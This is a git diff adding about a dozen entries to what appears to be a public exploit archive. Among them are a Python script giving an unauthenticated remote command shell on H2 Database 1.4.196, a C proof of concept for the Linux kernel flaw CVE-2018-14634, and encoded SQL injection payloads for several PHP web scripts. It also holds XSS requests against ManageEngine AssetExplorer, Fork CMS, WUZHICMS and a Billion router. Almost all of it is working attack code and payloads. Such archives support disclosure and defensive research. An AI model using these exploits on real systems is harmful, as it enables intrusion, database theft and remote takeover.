diff --git a/exploits/hardware/webapps/45515.txt b/exploits/hardware/webapps/45515.txt new file mode 100644 index 000000000..8a6ccbf44 --- /dev/null +++ b/exploits/hardware/webapps/45515.txt @@ -0,0 +1,30 @@ +# Exploit Title: Billion ADSL Router 400G 20151105641 - Cross-Site Scripting +# Author: Cakes +# Discovery Date: 2018-09-30 +# Vendor Homepage: http://www.billion.com +# Software Link: http://billionfirmware.co.za +# Tested Version: 20151105641 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description: +# Improper input validation on the router web interface allows attackers add a persistent +# Cross-Site scripting attack on the IP Interface field when adding a new static route. +# Simply intercept a new static route request and add in the XSS + +# Poc + +POST /configuration/edit-list.html HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: http://Target/configuration/edit-list.html +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 93 + +nodename=&destination=0.0.0.0&netmask=0.0.0.0&gateway=0.0.0.1&interface=&cost=1&action=create \ No newline at end of file diff --git a/exploits/java/webapps/45506.py b/exploits/java/webapps/45506.py new file mode 100755 index 000000000..764406261 --- /dev/null +++ b/exploits/java/webapps/45506.py @@ -0,0 +1,139 @@ +# Exploit Title: H2 Database 1.4.196 - Remote Code Execution +# Google Dork: N/A +# Date: 2018-09-24 +# Exploit Author: h4ckNinja +# Vendor Homepage: https://www.h2database.com/ +# Software Link: http://www.h2database.com/h2-2018-03-18.zip +# Version: 1.4.196 and 1.4.197 +# Tested on: macOS/Linux +# CVE: N/A + +# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/). +# When the test database has a password that is unknown, it is still possible to get the execution +# by creating a new database. The web console allows this by entering the name of the new database +# in the connection string. When the new database is created, the default credentials of +# username “sa” and password “” (blank) are created. The attacker is logged in automatically. +# The attached Python code, modified from 44422, demonstrates this. + +#!/usr/bin/env python + +''' +Exploit Title: Unauthenticated RCE +Date: 2018/09/24 +Exploit Author: h4ckNinja +Vendor: http://www.h2database.com/ +Version: all versions +Tested on: Linux, Mac +Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one. +Modified from: https://www.exploit-db.com/exploits/44422/ +''' + +import random +import string +import sys +import argparse +import html +import requests + + +def getSession(host): + url = 'http://{}'.format(host) + r = requests.get(url) + path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do') + + return '{}/{}'.format(url, path) + +def login(url, database): + data = { + 'language': 'en', + 'setting': 'Generic H2 (Embedded)', + 'name': 'Generic H2 (Embedded)', + 'driver': 'org.h2.Driver', + 'url': database, + 'user': 'sa', + 'password': '' + } + + print('[*] Attempting to create database') + r = requests.post(url, data=data) + + if 'Login' in r.text: + return False + + print('[+] Created database and logged in') + + return True + +def prepare(url): + cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;''' + url = url.replace('login', 'query') + + print('[*] Sending stage 1') + + r = requests.post(url, data={'sql': cmd}) + + if not 'NullPointerException' in r.text: + print('[+] Shell succeeded - ^c or quit to exit') + return url + + return False + +def execve(url, cmd): + r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)}) + + try: + execHTML = html.unescape(r.text.split('')[1].split('')[0].replace('
','\n').replace(' ',' ')).encode('utf-8').decode('utf-8','ignore') + print(execHTML) + + except Exception as e: + print('[-] Invalid command (' + str(e) + ')') + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + + parser.add_argument('-H', + '--host', + dest='host', + metavar='127.0.0.1:8082', + help='Specify a host', + required=True) + + parser.add_argument('-d', + '--database-url', + dest='database', + metavar='jdbc:h2:~/emptydb-' + randString, + default='jdbc:h2:~/emptydb-' + randString, + help='Database URL', + required=False) + + args = parser.parse_args() + +url = getSession(args.host) + +if login(url, args.database): + success = prepare(url) + + if success: + while True: + try: + cmd = input('h2-shell$ ') + + if 'quit' not in cmd: + execve(success, cmd) + + else: + print('[+] Shutting down') + sys.exit(0) + + except KeyboardInterrupt: + print() + print('[+] Shutting down') + sys.exit(0) + + else: + print('[-] Something went wrong injecting the payload.') + +else: + print('[-] Unable to login') \ No newline at end of file diff --git a/exploits/java/webapps/45507.txt b/exploits/java/webapps/45507.txt new file mode 100644 index 000000000..038039b8b --- /dev/null +++ b/exploits/java/webapps/45507.txt @@ -0,0 +1,30 @@ +# Exploit Title: ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting +# Date: 2018-09-26 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.manageengine.com/ +# Hardware Link : https://www.manageengine.com/products/asset-explorer/ +# Software : ZOHO Corp ManageEngine AssetExplorer 6.2.0 +# Product Version: 6.2.0 +# Vulernability Type : Cross-Site Scripting +# Vulenrability : Stored XSS +# CVE : N/A + +#In Zoho ManageEngine AssetExplorer, a Stored XSS vulnerability was discovered in the 6.2.0 +# version via the /AssetDef.do ciName or assetName parameter. + +# HTTP Request Header : + +POST /AssetDef.do HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/AssetDef.do +Cookie: JSESSIONID=70D4D1E08E51E5401B3E8FE1D17CAE9D; JSESSIONIDSSO=01AE09FF54B9B733107CD17E6D4079D7; sdp=8cb6d209-54e0-41cc-8bb2-1d462c6d3b72; nonitassetslinks=hide; Components=hide; virtual=hide; viewlinks=hide; Softwarediv=hide; barcodeDiv=hide; itassetslinks=show; %5Bobject%20HTMLTableRowElement%5D=hide; %5Bobject%20HTMLTableElement%5D=hide +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 705 + +typeId=9&ciTypeId=21&ciId=null&ciName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&assetName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22ismailtasdelen%22%29%3E&componentID=301&CI_BaseElement_ATTRIBUTE_302=&CI_BaseElement_IMPACTID=null&ciDescription=&activeStateId=2&isStateChange=&resourceState=1&assignedType=Assign&asset=0&user=0&department=0&leaseStart=&leaseEnd=&site=-1&location=&vendorID=0&assetPrice=0&assetTag=&acqDate=&assetSerialNo=&expDate=&assetBarCode=&warrantyExpDate=&udfName3=&depreciationTypeId=&declinePercent=&usefulLife=&depreciationPercent=&salvageValue=&isProductInfoChanged=&assetID=&previousSite=&addAsset=Save&purchasecost=&modifycost=true&oldAssociatedVendor= \ No newline at end of file diff --git a/exploits/linux/local/45516.c b/exploits/linux/local/45516.c new file mode 100644 index 000000000..b07af0189 --- /dev/null +++ b/exploits/linux/local/45516.c @@ -0,0 +1,298 @@ +/* +EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation. +EDB Note: poc-exploit.c +*/ + +/* + * poc-exploit.c for CVE-2018-14634 + * Copyright (C) 2018 Qualys, Inc. + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAPCOUNT_ELF_CORE_MARGIN (5) +#define DEFAULT_MAX_MAP_COUNT (USHRT_MAX - MAPCOUNT_ELF_CORE_MARGIN) + +#define PAGESZ ((size_t)4096) +#define MAX_ARG_STRLEN ((size_t)128 << 10) +#define MAX_ARG_STRINGS ((size_t)0x7FFFFFFF) + +#define die() do { \ + fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \ + exit(EXIT_FAILURE); \ +} while (0) + +int +main(void) +{ + if (sizeof(size_t) != sizeof(uint64_t)) die(); + const size_t alpha = 512; + const size_t sprand = 8192; + const size_t beta = (size_t)9 << 10; + const size_t items = (size_t)1 << 31; + const size_t offset = items * sizeof(uintptr_t); + + #define LLP "LD_LIBRARY_PATH=." + static char preload_env[MAX_ARG_STRLEN]; + { + char * const sp = stpcpy(preload_env, "LD_PRELOAD="); + char * cp = preload_env + sizeof(preload_env); + size_t n; + for (n = 1; n <= (size_t)(cp - sp) / sizeof(LLP); n++) { + size_t i; + for (i = n; i; i--) { + *--cp = (n == 1) ? '\0' : (i == n) ? ':' : '0'; + cp -= sizeof(LLP)-1; + memcpy(cp, LLP, sizeof(LLP)-1); + } + } + memset(sp, ':', (size_t)(cp - sp)); + if (memchr(preload_env, '\0', sizeof(preload_env)) != + preload_env + sizeof(preload_env)-1) die(); + } + const char * const protect_envp[] = { + preload_env, + }; + const size_t protect_envc = sizeof(protect_envp) / sizeof(protect_envp[0]); + size_t _protect_envsz = 0; + { + size_t i; + for (i = 0; i < protect_envc; i++) { + _protect_envsz += strlen(protect_envp[i]) + 1; + } + } + const size_t protect_envsz = _protect_envsz; + + const size_t scratch_envsz = (size_t)1 << 20; + const size_t scratch_envc = scratch_envsz / MAX_ARG_STRLEN; + if (scratch_envsz % MAX_ARG_STRLEN) die(); + static char scratch_env[MAX_ARG_STRLEN]; + memset(scratch_env, ' ', sizeof(scratch_env)-1); + + const size_t onebyte_envsz = (size_t)256 << 10; + const size_t onebyte_envc = onebyte_envsz / 1; + + const size_t padding_envsz = offset + alpha; + /***/ size_t padding_env_rem = padding_envsz % MAX_ARG_STRLEN; + const size_t padding_envc = padding_envsz / MAX_ARG_STRLEN + !!padding_env_rem; + static char padding_env[MAX_ARG_STRLEN]; + memset(padding_env, ' ', sizeof(padding_env)-1); + static char padding_env1[MAX_ARG_STRLEN]; + if (padding_env_rem) memset(padding_env1, ' ', padding_env_rem-1); + + const size_t envc = protect_envc + scratch_envc + onebyte_envc + padding_envc; + if (envc > MAX_ARG_STRINGS) die(); + + const size_t argc = items - (1 + 1 + envc + 1); + if (argc > MAX_ARG_STRINGS) die(); + + const char * const protect_argv[] = { + "./poc-suidbin", + }; + const size_t protect_argc = sizeof(protect_argv) / sizeof(protect_argv[0]); + if (protect_argc >= argc) die(); + size_t _protect_argsz = 0; + { + size_t i; + for (i = 0; i < protect_argc; i++) { + _protect_argsz += strlen(protect_argv[i]) + 1; + } + } + const size_t protect_argsz = _protect_argsz; + + const size_t padding_argc = argc - protect_argc; + const size_t padding_argsz = (offset - beta) - (alpha + sprand / 2 + + protect_argsz + protect_envsz + scratch_envsz + onebyte_envsz / 2); + const size_t padding_arg_len = padding_argsz / padding_argc; + /***/ size_t padding_arg_rem = padding_argsz % padding_argc; + if (padding_arg_len >= MAX_ARG_STRLEN) die(); + if (padding_arg_len < 1) die(); + static char padding_arg[MAX_ARG_STRLEN]; + memset(padding_arg, ' ', padding_arg_len-1); + static char padding_arg1[MAX_ARG_STRLEN]; + memset(padding_arg1, ' ', padding_arg_len); + + const char ** const envp = calloc(envc + 1, sizeof(char *)); + if (!envp) die(); + { + size_t envi = 0; + size_t i; + for (i = 0; i < protect_envc; i++) { + envp[envi++] = protect_envp[i]; + } + for (i = 0; i < scratch_envc; i++) { + envp[envi++] = scratch_env; + } + for (i = 0; i < onebyte_envc; i++) { + envp[envi++] = ""; + } + for (i = 0; i < padding_envc; i++) { + if (padding_env_rem) { + envp[envi++] = padding_env1; + padding_env_rem = 0; + } else { + envp[envi++] = padding_env; + } + } + if (envi != envc) die(); + if (envp[envc] != NULL) die(); + if (padding_env_rem) die(); + } + + const size_t filemap_size = ((padding_argc - padding_arg_rem) * sizeof(char *) / (DEFAULT_MAX_MAP_COUNT / 2) + PAGESZ-1) & ~(PAGESZ-1); + const size_t filemap_nptr = filemap_size / sizeof(char *); + char filemap_name[] = _PATH_TMP "argv.XXXXXX"; + const int filemap_fd = mkstemp(filemap_name); + if (filemap_fd <= -1) die(); + if (unlink(filemap_name)) die(); + { + size_t i; + for (i = 0; i < filemap_nptr; i++) { + const char * const ptr = padding_arg; + if (write(filemap_fd, &ptr, sizeof(ptr)) != (ssize_t)sizeof(ptr)) die(); + } + } + { + struct stat st; + if (fstat(filemap_fd, &st)) die(); + if ((size_t)st.st_size != filemap_size) die(); + } + + const char ** const argv = mmap(NULL, (argc + 1) * sizeof(char *), PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (argv == MAP_FAILED) die(); + if (protect_argc > PAGESZ / sizeof(char *)) die(); + if (mmap(argv, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argv) die(); + { + size_t argi = 0; + { + size_t i; + for (i = 0; i < protect_argc; i++) { + argv[argi++] = protect_argv[i]; + } + } + { + size_t n = padding_argc; + while (n) { + void * const argp = &argv[argi]; + if (((uintptr_t)argp & (PAGESZ-1)) == 0) { + if (padding_arg_rem || n < filemap_nptr) { + if (mmap(argp, PAGESZ, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != argp) die(); + } else { + if (mmap(argp, filemap_size, PROT_READ, MAP_FIXED | MAP_PRIVATE, filemap_fd, 0) != argp) die(); + argi += filemap_nptr; + n -= filemap_nptr; + continue; + } + } + if (padding_arg_rem) { + argv[argi++] = padding_arg1; + padding_arg_rem--; + } else { + argv[argi++] = padding_arg; + } + n--; + } + } + if (argi != argc) die(); + if (argv[argc] != NULL) die(); + if (padding_arg_rem) die(); + } + + { + static const struct rlimit stack_limit = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + if (setrlimit(RLIMIT_STACK, &stack_limit)) die(); + } + execve(argv[0], (char * const *)argv, (char * const *)envp); + die(); +} + +/* +EDB Note: EOF poc-exploit.c +*/ + + + + +/* +EDB Note: poc-suidbin.c +*/ + + +/* + * poc-suidbin.c for CVE-2018-14634 + * Copyright (C) 2018 Qualys, Inc. + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + +#include +#include +#include + +#define die() do { \ + fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \ + exit(EXIT_FAILURE); \ +} while (0) + +int +main(const int argc, const char * const * const argv, const char * const * const envp) +{ + printf("argc %d\n", argc); + + char stack = '\0'; + printf("stack %p < %p < %p < %p < %p\n", &stack, argv, envp, *argv, *envp); + + #define LLP "LD_LIBRARY_PATH" + const char * const llp = getenv(LLP); + printf("getenv %p %s\n", llp, llp); + + const char * const * env; + for (env = envp; *env; env++) { + if (!strncmp(*env, LLP, sizeof(LLP)-1)) { + printf("%p %s\n", *env, *env); + } + } + exit(EXIT_SUCCESS); +} + +/* +EDB Note: EOF poc-suidbin.c +*/ \ No newline at end of file diff --git a/exploits/php/webapps/45508.txt b/exploits/php/webapps/45508.txt new file mode 100644 index 000000000..3ce1751b6 --- /dev/null +++ b/exploits/php/webapps/45508.txt @@ -0,0 +1,29 @@ +# Exploit Title: Fork CMS 5.4.0 - Cross-Site Scripting +# Date: 2018-09-26 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.fork-cms.com/ +# Software Link : https://github.com/forkcms/forkcms +# Software : Fork 5.4.0 +# Product Version: 5.4.0 +# Vulernability Type : Code Injection +# Vulenrability : HTML Injection and Stored XSS + +# In the 5.4.0 version of the Fork CMS software, HTML Injection and Stored XSS vulnerabilities +# were discovered via the /backend/ajax URI. + +# HTTP POST Request : + +POST /backend/ajax HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://Target/private/en/pages/add?token=2quwpxbx78 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 299 +Cookie: track=s%3A32%3A%22e36b0c664ad21e30c493893c3612f5cc%22%3B; PHPSESSID=1103079034ec4a8e726bea6a0746731e; interface_language=en; frontend_language=en; track=1; jstree_open=page-425 +Connection: close + +fork%5Bmodule%5D=Core&fork%5Baction%5D=GenerateUrl&fork%5Blanguage%5D=en&url=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&metaId=&baseFieldName=title&custom=1&className=Backend%5CModules%5CPages%5CEngine%5CModel&methodName=getUrl¶meters=a%3A3%3A%7Bi%3A0%3Bi%3A0%3Bi%3A1%3Bi%3A0%3Bi%3A2%3Bb%3A0%3B%7D \ No newline at end of file diff --git a/exploits/php/webapps/45509.txt b/exploits/php/webapps/45509.txt new file mode 100644 index 000000000..e1777ada6 --- /dev/null +++ b/exploits/php/webapps/45509.txt @@ -0,0 +1,19 @@ +# Exploit Title: Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection +# Dork: N/A +# Exploit Author: Ihsan Sencan +# Date: 2018-10-01 +# Vendor Homepage: http://scriptzee.com/ +# Software Link: http://scriptzee.com/products/details/35 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-N/A + +# POC: +# http://localhost/[PATH]/hotels?h_room_type=[SQL] + +%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%45%66%65 + +# http://localhost/[PATH]/hotels?destination=[SQL] + +' AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT((SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='efe \ No newline at end of file diff --git a/exploits/php/webapps/45510.txt b/exploits/php/webapps/45510.txt new file mode 100644 index 000000000..3694332e8 --- /dev/null +++ b/exploits/php/webapps/45510.txt @@ -0,0 +1,23 @@ +# Exploit Title: Education Website 1.0 - 'subject' SQL Injection +# Dork: N/A +# Date: 2018-10-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://scriptzee.com/ +# Software Link: http://scriptzee.com/products/details/34 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# http://localhost/[PATH]/college_list.html?subject=[SQL] + +-7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+- + +# http://localhost/[PATH]/college_list.html?city=[SQL] + +'+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+- + +# http://localhost/[PATH]/college_list.html?country=[SQL] + +'+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+- \ No newline at end of file diff --git a/exploits/php/webapps/45511.txt b/exploits/php/webapps/45511.txt new file mode 100644 index 000000000..dccd65611 --- /dev/null +++ b/exploits/php/webapps/45511.txt @@ -0,0 +1,26 @@ +# Exploit Title: Singleleg MLM Software 1.0 - 'msg_id' SQL Injection +# Dork: N/A +# Date: 2018-10-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://mlmsoftwarez.in/ +# Software Link: http://mlmdemo.biz/singleleg/root.html +# Software Link: http://mlmdemo.biz/autopool/root.html +# Software Link: http://mlmdemo.biz/gift/root.html +# Software Link: http://mlmdemo.biz/investment/root.html +# Software Link: http://mlmdemo.biz/bidding/root.html +# Software Link: http://mlmdemo.biz/adclicking/root.html +# Software Link: http://mlmdemo.biz/repurchase/root.html +# Software Link: http://mlmdemo.biz/moneyorderplan/root.html +# Software Link: http://mlmdemo.biz/level/root.html +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# Affected Products: Singleleg MLM Software 1.0, Autopool MLM Software 1.0, Gift MLM Software 1.0 +# Investmen MLM Software 1.0, Bidding MLM Software 1.0, ADD Clicking MLM Software 1.0 +# Repurchase MLM Software 1.0, Moneyorder MLM Software 1.0, Level MLM Software 1.0 +# CVE: N/A + +# POC: +# http://localhost/[PATH]/member/readmsg.php?msg_id=[SQL] + +%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d \ No newline at end of file diff --git a/exploits/php/webapps/45512.txt b/exploits/php/webapps/45512.txt new file mode 100644 index 000000000..8b632c4ce --- /dev/null +++ b/exploits/php/webapps/45512.txt @@ -0,0 +1,15 @@ +# Exploit Title: Binary MLM Software 1.0 - 'pid' SQL Injection +# Dork: N/A +# Date: 2018-10-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://mlmsoftwarez.in/ +# Software Link: http://mlmdemo.biz/binary/root.html +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# http://localhost/[PATH]/member/tree.php?pid=[SQL] + +%2d%74%65%73%74%35%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%2c%28%31%35%29%29%2d%2d%20%2d \ No newline at end of file diff --git a/exploits/php/webapps/45513.txt b/exploits/php/webapps/45513.txt new file mode 100644 index 000000000..335c41189 --- /dev/null +++ b/exploits/php/webapps/45513.txt @@ -0,0 +1,19 @@ +# Exploit Title: Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection +# Dork: N/A +# Date: 2018-10-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://scriptzee.com/ +# Software Link: http://scriptzee.com/products/details/15 +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# http://localhost/[PATH]/site-search?sortBy=date_started[SQL] + +%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%31%31%39%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%29%29 + +# http://localhost/[PATH]/site-search?sortDir=desc[SQL] + +%2c%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 \ No newline at end of file diff --git a/exploits/php/webapps/45514.txt b/exploits/php/webapps/45514.txt new file mode 100644 index 000000000..d5c573439 --- /dev/null +++ b/exploits/php/webapps/45514.txt @@ -0,0 +1,16 @@ +# Title: WUZHICMS 2.0 - Cross-Site Scripting +# Author: Felipe "Renzi" Gabriel +# Date: 2018-10-01 +# Vendor: http://www.wuzhicms.com +# Software: WUZHICMS 2.0 +# CVE: CVE-2018-17832 + +# Technical Details & Description: +# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0 web-application. +# The vulnerability is located in the 'v' and 'f' parameters of the`index.php` action GET method request. + +# PoC + +http://Target/index.php?v=">

RENZI

+ +http://Target/index.php?f=">

RENZI

